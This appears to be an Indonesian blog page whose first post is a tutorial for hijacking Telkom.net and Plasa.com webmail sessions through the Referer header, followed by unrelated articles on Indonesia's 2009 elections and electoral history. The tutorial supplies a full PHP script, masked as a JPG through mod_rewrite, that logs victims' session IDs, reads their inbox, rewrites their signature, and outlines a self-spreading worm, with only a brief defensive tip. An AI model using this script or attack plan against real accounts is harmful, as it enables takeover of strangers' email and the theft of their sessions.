Hacking Email Telkom.net dan Plasa.com  

Oleh M. Akbar Fitriyan, Hs

Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.

Webmail Session Hijacking

Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.

Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.

SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:

  1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
  2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi:

    Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.

SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly (baca: protecting cookie with httponly ). Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.

Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.

Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.

telkom.net URL

telkom.net URL


plasa.com URL

plasa.com URL

SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:

http://mail.telkom.net/Session/206017-7vY8EVuJF2935NV9Fhzl-kmbcuww/mailbox.wssp?Mailbox=INBOX&

http://mail1.plasa.com/Session/70174-k2O8e3vcnJEFxmxWYpOX-kmbcuwc/mailbox.wssp?Mailbox=INBOX&

Stealing SessionID from Referer Header

Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.

Ketika pengunjung sedang membuka halaman dengan URL:

http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/Mailbox.wssp?Mailbox=INBOX

Kemudian ketika terjadi request ke sebuah file image:

http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif

Maka pada request GET tersebut akan ada header seperti di bawah ini:

1

2
3
4
5
6
7
8
9
10
11
GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1

Host: mail.telkom.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
Cache-Control: max-age=0

Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.

Attack Scenario

Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.

Preparing the Script

Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.

URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:

1

2
3
RewriteEngine On

RewriteBase /
RewriteRule mylab/image.jpg mylab/checkmail.php

Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.

1

2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88


// Ambil header Referer
$ref = $_SERVER["HTTP_REFERER"];
$telkomnet = false;
$plasacom = false;
$width = 468;
$height = 100;
if (strpos($ref,"telkom.net")>-1) {
$telkomnet = true;
}
if (strpos($ref,"plasa.com")>-1) {
$plasacom = true;
}
if ($telkomnet===false && $plasacom===false) {
exit();
}

$file = fopen("daftarkorban.txt","a");
$url_tokens = parse_url($ref);
$host = $url_tokens["host"];
$tokens = explode("/",$ref);
$sessid = $tokens[4];
fwrite($file,"######\n");
fwrite($file,"REFERER:".$_SERVER["HTTP_REFERER"]."\n");
fwrite($file,"SESSID:".$sessid."\n");

$urlhost = "http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&";
$inboxhtml = file_get_contents($urlhost);

preg_match((.*?)'/<\/title>/i', $inboxhtml, $matches);
$title=$matches[1];
$email = $title;
$pos = strpos($title," ");
if ($pos > -1) {
$email = substr($title,0,$pos);
}

fwrite($file,"KORBAN:".$email."\n");
fwrite($file,"******\n");
fclose($file);

$image = ImageCreate($width, $height);
$white = ImageColorAllocate($image, 255, 255, 255);
$black = ImageColorAllocate($image, 0, 0, 0);
$grey = ImageColorAllocate($image, 204, 204, 204);
ImageFill($image, 0, 0, $black);
ImageString($image, 3, 15, 5, $sessid, $white);
ImageString($image, 3, 25, 25, $email, $white);

// Writing Signature...
$url = "http://mail.telkom.net/Session/$sessid/settings.wssp";
if ($plasacom==true) {
$url = "http://mail1.plasa.com/Session/$sessid/settings1.wssp";
}
$old_settings = file_get_contents($url);
preg_match('/(.*?)<\/textarea>/i', $old_settings, $matches);
$oldsig = $matches[2];

$data = array();
$data["UserFrom"] = $email;
$newsig = "[YOUR EMAIL HAS BEEN HACKED]".$oldsig;
$data["Signature"] = $newsig;
$data["Update"] = "Update";

$response = doPost($url,$data);
if ((strpos($response,"Updated")>-1 && $telkomnet==true) || $plasacom==true) {
ImageString($image, 3, 35, 50, "Signature anda berhasil diganti menjadi:" , $white);
ImageString($image, 3, 45, 65, $newsig , $white);
}
header("Content-Type: image/jpeg");
ImageJpeg($image);
ImageDestroy($image);

function doPost($url,$data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
if(curl_errno($ch))
{
$response = curl_error($ch);
}
curl_close($ch);
return $response;
}
?>

Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.

Launch The Attack

Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.

compose attack email

compose attack email

Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.

signature1

Dan gambar berikut adalah gambar ketika email attacker tiba.

email attacker tiba

email attacker tiba

Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.

victim open email and his session hijacked instantly

victim open email and his session hijacked instantly

Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.

signature2

Worm Attack: More Dangerous Scenario

Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.

Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.

Tips Menghindari Serangan

Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.

From: www.ilmuhacking.com

Baca Selengkapnya..

Indonesia Memilih (bagian pertama)  

Oleh M. Akbar Fitriyan, Hs

Bila suasana Jakarta terlihat tenang, sunyi senyap di jalan-jalan utama pada hari pelaksanaan Pesta Demokrasi Pemilu 2009 — baik sebelum dan pasca pencontrengan di TPS-TPS, mungkin tak begitu suasana dalam hati para petinggi partai, konstituen/simpatisannya. Hampir dapat dipastikan hati mereka diliputi perasaan optimisme yang bercampur harap dan cemas mengikuti hasil penghitungan suara dari TPS-TPS di seantero Nusantara.

Akankah Kampanye Damai Pemilu Indonesia 2009 yang telah mereka rancang, laksanakan dan upayakan jauh2 hari dan memeras waktu, tenaga dan perhatian mereka akan membuahkan hasil manis seperti yang diharapkan?

Jawaban finalnya baru akan kita lihat bersama dalam beberapa hari mendatang. Namun bila penasaran ingin tahu pergerakan pengumpulan suara atau perkiraan hasilnya , rajin-rajin lah mengikuti berita di layar kaca ataupun mengklik situs berita di internet (misalnya detik.com atawa okezone.com) untuk mengetahui hasil hitung cepat/quick count dari beberapa lembaga survey, diantaranya: LP3ES, Lembaga Survei Indonesia, Lembaga Survei Nasional, Lingkaran Survei Indonesia, CIRUS Surveyors Group.

Memang terdapat pro dan kontra mengenai absah tidaknya keberadaan maupun hasil quick count dari lembaga2 tersebut. Namun baik KPU maupun MK bisa menerima adanya quick-count, dengan catatan, hasilnya diumumkan sesudah masa pencontrengan berakhir dan semata untuk memberikan gambaran cepat saja. Bagaimana hasil quick count pengumpulan suara Partai Kesayangan anda Semua? Dari hasil intipan saya beberapa saat lalu disalah satu layar kaca dan situs berita di dunia maya yan gberasal dari beberapa lembaga survey , terlihat Partai Demokrat, PDIP, Golkar, PKS menduduki peringkat atas hasil quick count. Beberapa partai ‘lama’ terlihat dalam daftar 10 besar. Dari partai “baru”, hanya Hanura dan Gerindra yang telah “masuk hitungan”

Sekali lagi, hasil quick count semata hanya untuk memantau hasil sementara Pemilu 2009. Juga sebagai ‘perbandingan’ bagi data yang dikeluarkan secara resmi oleh KPU. Dan bagaimana pun, satu2nya lembaga yang resmi dan absah untuk menetapkan hasil final adalah Komisi Pemilihan Umum. Untuk itu, kita masih harus bersabar untuk beberapa hari kedepan.

Harapan saya, seperti Kampanye Damai Pemilu Indonesia 2009 yang telah berlangsung cukup damai, penghitungan suara dan pengumuman finalnya dapat berlangsung dengan damai juga. Amiin.

Baca Selengkapnya..

Capres Harus Siap Kalah  

Oleh M. Akbar Fitriyan, Hs

Megawati - Kalla - SBY

Megawati - Kalla - SBY

Para pasangan calon presiden dan wakil presiden yang akan bersaing dalam pemilihan presiden (pilpres) 8 Juli 2009 harus siap menerima kekalahan dan sportif .

Dalam Pemilu AS, kontestan yang kalah mengakui kekalahannya dengan tulus secara pribadi, mengucapkan selamat pada kesempatan pertama setelah hasil penghitungan suara diketahui pasti,” kata guru besar emeritus Universitas Indonesia, Alwi Dahlan di Jakarta, Rabu.

“Biasanya ia berjanji akan mendukung pemerintahan yang menang kapan pun diperlukan dan menyatakan jika ada yang diperlukan dari dirinya,” katanya pada dialog ilmiah tentang Pilpres 2009: Siap Kalah, Siap Menang di LIPI Jakarta.

Ia mengatakan, yang menang pun mengucapkan terima kasih, memuji ketangguhan lawannya dalam pertarungan yang baru selesai di antara mereka dan mengharapkan kerja sama selanjutnya.

Keduanya kemudian menemui para pendukungnya masing-masing, menjelaskan pembicaraan mereka berdua dan meminta para pendukung untuk kembali bahu-membahu sebagai bangsa.

“Saat itu yang menang atau kalah hanyalah diri pribadinya, yang sebenarnya meraih kemenangan adalah keutuhan bangsa dan negara untuk dipertahankan bersama. Meskipun tidak tertulis dan diatur institusi , hal itu berjalan secara wajar dan sportif,” katanya.

Ia mengatakan, sikap “tidak siap kalah” sudah dikenal dan banyak dibicarakan, seperti penarikan kembali “bantuan” yang tadinya diberikan calon kepada pemilih, aksi protes atau tuntutan pemilu ulang terhadap hasil penghitungan yang serta-merta dianggap curang.

Bahkan, kata mantan Ketua Umum Ikatan Sarjana Komunikasi Indonesia (ISKI) ini, sering terjadi perubahan perilaku normal dan stres kejiwaan.

Bagi banyak peserta, katanya, menang adalah tujuan akhir dari pemilu. Ia memberikan kepada pemenang hak mutlak untuk berperan, menjalankan kekuasaan tanpa keikutsertaan dari lawan yang kalah.

“Bagaimana pun besar kemenangannya, pemenang tidak akan mungkin dapat mewujudkan segala janji dan program yang didengungkan saat kampanye tanpa dukungan dan keikutsertaan seluruh masyarakat, termasuk mereka yang memilih lawannya,” katanya. (*)

Sumber : antara

Baca Selengkapnya..

Hasil Pilpres Bisa Diketahui Pukul 16.00  

Oleh M. Akbar Fitriyan, Hs

JAKARTA, KOMPAS.com — Dalam Pilpres 2009 masyarakat tidak memerlukan waktu yang lama untuk mengetahui siapa yang akan menjadi presiden dan wakil presiden Republik Indonesia periode 2009-2014 karena pemenang Pilpres 2009 akan dapat diketahui pada pukul 16.00 saat hari pelaksanaan pilpres berlangsung.

Demikian dikatakan Ketua Asosiasi Riset Opini Publik Indonesia (AROPI) Denny JA seusai Mahkamah Konstitusi (MK) mengabulkan gugatan yang diajukannya terhadap Pasal 188 Ayat 2, 3; Pasal 228; dan Pasal 255 UU 42/2008 terkait pelarangan publikasi penghitungan cepat (quick count) di hari pelaksanaan pilpres. "Akibat keputusan ini, masyarakat akan tahu hasil pilpres pukul 16.00," kata Denny di Gedung MK, Jakarta, Jumat (3/7).

Selain mengetahui siapa yang akan menjadi presiden dan wakil presiden periode selanjutnya, hasil penghitungan cepat tersebut juga akan memperlihatkan apakah Pilpres 2009 berlangsung satu putaran atau dua putaran. Karenanya, Denny mengaku berterima kasih kepada MK yang telah mengabulkan gugatannya terhadap pasal dalam UU 10/2008 yang melarang lembaga survei memublikasikan surveinya pada saat hari pelaksanaan pilpres.

Sebelum dibatalkan oleh MK, lembaga survei dilarang memublikasikan hasil penghitungan cepatnya (quick count) pada hari pelaksanaan pilpres berlangsung. Hal ini tertuang dalam Pasal 188 Ayat 3 UU 42/2008 yang berbunyi hasil penghitungan cepat dapat diumumkan dan atau disebarluaskan paling cepat pada hari berikutnya dari hari/tanggal pemungutan suara, yang mana jika dilanggar akan dikenakan sanksi pidana penjara paling singkat 3 bulan dan paling lama 12 bulan dan denda paling sedikit Rp 3.000.000 dan paling banyak Rp 12.000.000 sesuai dengan isi dari Pasal 228 UU 42/2008.

Selain itu, dalam Pasal 255 UU 42/2008 juga dikatakan setiap orang atau lembaga yang mengumumkan hasil penghitungan cepat pada hari/tanggal pemungutan suara, dipidana dengan pidana penjara paling singkat 6 bulan dan paling lama 18 bulan dengan denda paling sedikit Rp 6.000.000 dan paling banyak Rp 18.000.000. Setelah MK mengabulkan pembatalan pasal pasal tersebut, maka secara otomatis isi dari pasal pasal tersebut tidak berlaku lagi, dan lembaga survei diperbolehkan untuk menyampaikan hasil perhitungan cepatnya pada hari ketika pilpres berlangsung.

Baca Selengkapnya..

SEJARAH PEMILIHAN UMUM  

Oleh M. Akbar Fitriyan, Hs



Pemilu 1955

Ini merupakan pemilu yang pertama dalam sejarah bangsa Indonesia. Waktu itu Republik Indonesia berusia 10 tahun. Kalau dikatakan pemilu merupakan syarat minimal abgi adanya demokrasi, apakah berarti selama 10 tahun itu Indonesia benar-benar tidak demokratis? Tidak mudah juga menjawab pertanyaan tersebut.
Yang jelas, sebetulnya sekitar tiga bulan setelah kemerdekaan di proklamasikan oleh Soekarno dan Hatta pada 17 Agustus 1945, pemerintah waktu itu sudah menyatakan keinginannya untuk bisa menyelenggarakan pemilu pada awal tahun 1946. Hal itu dicantumkan dalam Maklumat X, atau Maklumat Wakil Presiden Mohammad Hatta tanggal 3 Nopember 1945, yang berisi anjuran tentang pembentukan partai-partai politik.
Maklumat tersebut menyebutkan, pemilu untuk memilih anggota DPR dan MPR akan diselenggarakan bulan Januari 1946. Kalau kemudian ternyata pemilu pertama tersebut baru terselenggara hampir sepuluh tahun setelah kemudian tentu bukan tanpa sebab.

Tetapi, berbeda dengan tujuan yang dimaksudkan oleh Maklumat X, pemilu 1955 dilakukan dua kali. Yang pertama, pada 29 September 1955 untuk memilih anggota-anggota DPR. Yang kedua, 15 Desember 1955 untuk memilih anggota-anggota Dewan Konstituante. Dalam Maklumat X hanya disebutkan bahwa pemilu yang akan diadakan Januari 1946 adalah untuk memilih anggota DPR dan MPR, tidak ada Konstituante.

Keterlambatan dan "penyimpangan" tersebut bukan tanpa sebab pula. Ada kendala yang bersumber dari dalam negeri dan ada pula yang berasal dari faktor luar negeri. Sumber penyebab dari dalam antara lain ketidaksiapan pemerintah menyelenggarakan pemilu, baik karena belum tersedia perangkat perundang-undangan untuk mengatur penyelenggaraan pemilu maupun akibat rendahnya stabilitas keamanan negara. Dan yang tidak kalah pentingnya, penyebab dari dalam itu adalah sikap pemerintah yang enggan menyelenggarakan perkisaran (sirkulasi) kekuasaan secara teratur dan kompetitif. Penyebab dari luar antara lain serbuan kekuatan asing yang mengharuskan negara ini terlibat peperangan.

Tidak terlaksana pemilu pertama pada bulan Januari 1946 seperti yang diamanatkan oleh Maklumat 3 Nopember 1945, paling tidak disebabkan 2 (dua) hal :
  1. Belum siapnya pemerintah baru, termasuk dalam penyusunan perangkat UU Pemilu
  2. Belum stabilnya kondisi keamanan negara akibat konflik internal antara kekuatan politik yang ada pada waktu itu, apalagi pada saat yang sama gangguan dari luar juga masih mengancam. Dengan kata lain para pemimpin lebih disibukkan oleh urusan konsolidasi.
Namun tidak berarti bahwa konsolidasi kekuatan bangsa dan perjuangan mengusir penjajah itu, pemerintah kemudian tidak berniat untuk menyelenggarakan pemilu. Ada indikasi kuat bahwa pemerintah punya keinginan politik untuk menyelenggarakan pemilu. Misalnya adalah dibentuknya UU No.27 tahun 1948 tentang pemilu, yang kemudian diubah dengan UU No.12 tahun 1949 tentang Pemilu. Di dalam UU No.12/1949 diamanatkan bahwa pemilihan umum yang akan dilakukan adalah bertingkat (tidak langsung). Sifat pemilihan tidak langsung ini didsarkan pada alasan bahwa mayoritas warganegara Indonesia pada waktu itu masih buta huruf, sehingga kalau pemilihannya langsung dikhawatirkan akan banyak terjadi distorsi.

Kemudian pada paroh kedua tahun 1950, ketika Mohammad Natsir dari Masyumi menjadi Perdana Menteri, pemerintah memutuskan untuk menjadi pemilu sebagai program kabinetnya. Sejak itu pembahasan UU Pemilu mulai dilakukan lagi, yang dilakukan oelh Panitia Sahardjo dan Kantor Panitia Pemilihan Pusat sebelum kemudian dilanjutkan ke parlemen. Pada waktu itu Indonesia kembali menjadi negara kesatuan, setelah sejak 1949 menjadi negara serikat dengan nama Republik Indonesia Serikat (RIS).

Setelah Kabinet Natsir jatuh 6 bulan kemudian, pembahasan RUU Pemilu dilanjutkan oleh pemerintahan SUkiman Wirjosandjojo, juga dari Masyumi. Pemerintah ketika itu berupaya menyelenggarakan pemilu karena pasal 57 UUDS 1950 menyatakan bahwa anggota DPR dipilih oleh rakyat melalui pemilihan umum.

Tetapi pemerintah Sukiman juga tidak berhasil menuntaskan pembahasan undang-undang pemilu tersebut. Selanjutnya UU ini baru selesai dibahas oleh parlemen pada masa pemerintahan Wilopo dari PNI pada tahun 1953. Maka lahirlah UU No.7 tahun 1953 tentang Pemilu. UU inilah yang menjadi payung hukum Pemilu 1955 yang diselenggarakan secara langsung, umum, bebas dan rahasia. Dengan demikian UU No.27 tahun 1948 tentang Pemilu yang diubah dengan UU No.12 tahun 1949 yang mengadopsi pemilihan bertingkat (tidak langsung) bagi anggota DPR tidak berlaku lagi.

Patut dicatat dan dibanggakan bahwa pemilu yang pertama kali tersebut berhasil diselenggarakan dengan aman, lancar, jujur dan adil serta sangat demokratis. Pemilu 1955 bahkan mendapat pujian dari berbagai pihak, termasuk negara-negara asing. Pemilu ini diikuti oleh lebih dari 30-an partai politik dan lebih dari seratus daftar kumpulan dan calon perorangan.

Yang menarik dari Pemilu 1955 adalah tingginya kesadaran berkompetisi secara sehat. Misalnya, meski yang menjadi calon anggota DPR adalah perdana menteri dan menteri yang sedang memerintah, mereka tidak menggunakan fasilitas negara dan otoritasnya kepada pejabat bawahan untuk menggiring pemilih yang menguntungkan partainya.
Karena itu sosok pejabat negara tidak dianggap sebagai pesaing yang menakutkan dan akan memenangkan pemilu dengan segala cara. Karena pemilu kali ini dilakukan untuk dua keperluan, yaitu memilih anggota DPR dan memilih anggota Dewan Kosntituante, maka hasilnya pun perlu dipaparkan semuanya.

From: http://www.calegindonesia.com

Baca Selengkapnya..